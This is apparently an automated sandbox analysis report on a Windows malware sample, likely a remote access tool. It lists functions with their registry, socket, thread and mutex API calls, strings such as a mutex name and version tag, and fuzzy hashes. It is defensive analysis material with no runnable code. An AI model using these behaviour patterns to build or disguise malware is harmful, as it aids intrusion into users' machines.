                                                                                          • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D
                                                                                          Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                          • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                          • API String ID: 994465650-2151626615
                                                                                          • Opcode ID: 45ff517fd2582d6e0a202418ab4ffabcdb2540000aed43e3d88e52077495edcf
                                                                                          • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                                                          • Opcode Fuzzy Hash: 45ff517fd2582d6e0a202418ab4ffabcdb2540000aed43e3d88e52077495edcf
                                                                                          • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                                                                                          Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                                          • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                                                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                          • String ID:
                                                                                          • API String ID: 3658366068-0
                                                                                          • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                          • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                                          • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                          • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                                                                                          Function 0040DA6F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1017 40da6f-40da94 call 401f86 1020 40da9a 1017->1020 1021 40dbbe-40dbe4 call 401f04 GetLongPathNameW call 40417e 1017->1021 1023 40dae0-40dae7 call 41c048 1020->1023 1024 40daa1-40daa6 1020->1024 1025 40db93-40db98 1020->1025 1026 40dad6-40dadb 1020->1026 1027 40dba9 1020->1027 1028 40db9a-40db9f call 43c11f 1020->1028 1029 40daab-40dab9 call 41b645 call 401f13 1020->1029 1030 40dacc-40dad1 1020->1030 1031 40db8c-40db91 1020->1031 1044 40dbe9-40dc56 call 40417e call 40de0c call 402fa5 * 2 call 401f09 * 5 1021->1044 1045 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1023->1045 1046 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1023->1046 1033 40dbae-40dbb3 call 43c11f 1024->1033 1025->1033 1026->1033 1027->1033 1039 40dba4-40dba7 1028->1039 1048 40dabe 1029->1048 1030->1033 1031->1033 1047 40dbb4-40dbb9 call 409092 1033->1047 1039->1027 1039->1047 1053 40dac2-40dac7 call 401f09 1045->1053 1046->1048 1047->1021 1048->1053 1053->1021
                                                                                          APIs
                                                                                          • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LongNamePath
                                                                                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                          • API String ID: 82841172-425784914
                                                                                          • Opcode ID: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                                          • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                                          • Opcode Fuzzy Hash: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                                          • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
                                                                                          Function 0041B354 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1117 41b354-41b3ab call 41c048 call 4135e1 call 401fe2 call 401fd8 call 406b1c 1128 41b3ad-41b3bc call 4135e1 1117->1128 1129 41b3ee-41b3f7 1117->1129 1133 41b3c1-41b3d8 call 401fab StrToIntA 1128->1133 1131 41b400 1129->1131 1132 41b3f9-41b3fe 1129->1132 1134 41b405-41b410 call 40537d 1131->1134 1132->1134 1139 41b3e6-41b3e9 call 401fd8 1133->1139 1140 41b3da-41b3e3 call 41cffa 1133->1140 1139->1129 1140->1139
                                                                                          APIs
                                                                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                            • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                            • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                                            • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                          • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                          • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                          • API String ID: 782494840-2070987746
                                                                                          • Opcode ID: 619bc13ef983509798e4cc56ab9e00072be03ad0848662060b437d2fd6fbf6a7
                                                                                          • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                                                          • Opcode Fuzzy Hash: 619bc13ef983509798e4cc56ab9e00072be03ad0848662060b437d2fd6fbf6a7
                                                                                          • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                                                                          Function 004137AA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1208 4137aa-4137c1 RegCreateKeyA 1209 4137c3-4137f8 call 40247c call 401fab RegSetValueExA RegCloseKey 1208->1209 1210 4137fa 1208->1210 1211 4137fc-41380a call 401fd8 1209->1211 1210->1211
                                                                                          APIs
                                                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                          • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137E1
                                                                                          • RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137EC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCreateValue
                                                                                          • String ID: pth_unenc
                                                                                          • API String ID: 1818849710-4028850238
                                                                                          • Opcode ID: 4470799dcfde6683a975b44515cd928480e6138ab46ed270d1b1aebcf1de6a3b
                                                                                          • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                                                          • Opcode Fuzzy Hash: 4470799dcfde6683a975b44515cd928480e6138ab46ed270d1b1aebcf1de6a3b
                                                                                          • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                                                          Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                                          • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00404DDB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                          • String ID:
                                                                                          • API String ID: 3360349984-0
                                                                                          • Opcode ID: 98051303979d36a8a23a627160a2524b31ad8a85d3850f5550fb2e4a72bacabe
                                                                                          • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                                                          • Opcode Fuzzy Hash: 98051303979d36a8a23a627160a2524b31ad8a85d3850f5550fb2e4a72bacabe
                                                                                          • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                          Function 00415B25 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CountEventTick
                                                                                          • String ID: !D@
                                                                                          • API String ID: 180926312-604454484
                                                                                          • Opcode ID: 453747f8b7d921336352e19ec40eeef5cece41cebce93a96a69930c929b95aca
                                                                                          • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                                                          • Opcode Fuzzy Hash: 453747f8b7d921336352e19ec40eeef5cece41cebce93a96a69930c929b95aca
                                                                                          • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                                                          Function 0040D0A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1357 40d0a4-40d0d0 call 401fab CreateMutexA GetLastError
                                                                                          APIs
                                                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                                                          • GetLastError.KERNEL32 ref: 0040D0BE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateErrorLastMutex
                                                                                          • String ID: Rmc-35QZU7
                                                                                          • API String ID: 1925916568-2240621246
                                                                                          • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                                          • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                                                          • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                                          • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                                                          Function 004135E1 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1360 4135e1-41360d RegOpenKeyExA 1361 413642 1360->1361 1362 41360f-413637 RegQueryValueExA RegCloseKey 1360->1362 1363 413644 1361->1363 1362->1363 1364 413639-413640 1362->1364 1365 413649-413655 call 402093 1363->1365 1364->1365
                                                                                          APIs
                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                                          • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3677997916-0
                                                                                          • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                          • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                                                          • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                          • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                                                          Function 00413733 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
                                                                                          • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3677997916-0
                                                                                          • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                          • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                                                                          • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                          • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                                                                          Function 00413584 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
                                                                                          • RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3677997916-0
                                                                                          • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                          • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                                                          • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                          • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                                                          Function 0041353A Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C1D7,00466C58), ref: 00413551
                                                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C1D7,00466C58), ref: 00413565
                                                                                          • RegCloseKey.KERNEL32(?,?,?,0040C1D7,00466C58), ref: 00413570
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3677997916-0
                                                                                          • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                          • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                                                                          • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                          • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                                                                          Function 004138B2 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                          • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                                          • RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCreateValue
                                                                                          • String ID:
                                                                                          • API String ID: 1818849710-0
                                                                                          • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                          • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                                                          • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                          • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                                                          Function 0041B847 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: GlobalMemoryStatus
                                                                                          • String ID: @
                                                                                          • API String ID: 1890195054-2766056989
                                                                                          • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                          • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                                                          • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                          • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                                                          Function 00446206 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 00446227
                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                          • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap$_free
                                                                                          • String ID:
                                                                                          • API String ID: 1482568997-0
                                                                                          • Opcode ID: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                                                                          • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                                                                                          • Opcode Fuzzy Hash: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                                                                          • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
                                                                                          Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                                            • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateEventStartupsocket
                                                                                          • String ID:
                                                                                          • API String ID: 1953588214-0
                                                                                          • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                          • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                                                                          • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                          • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                                          Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
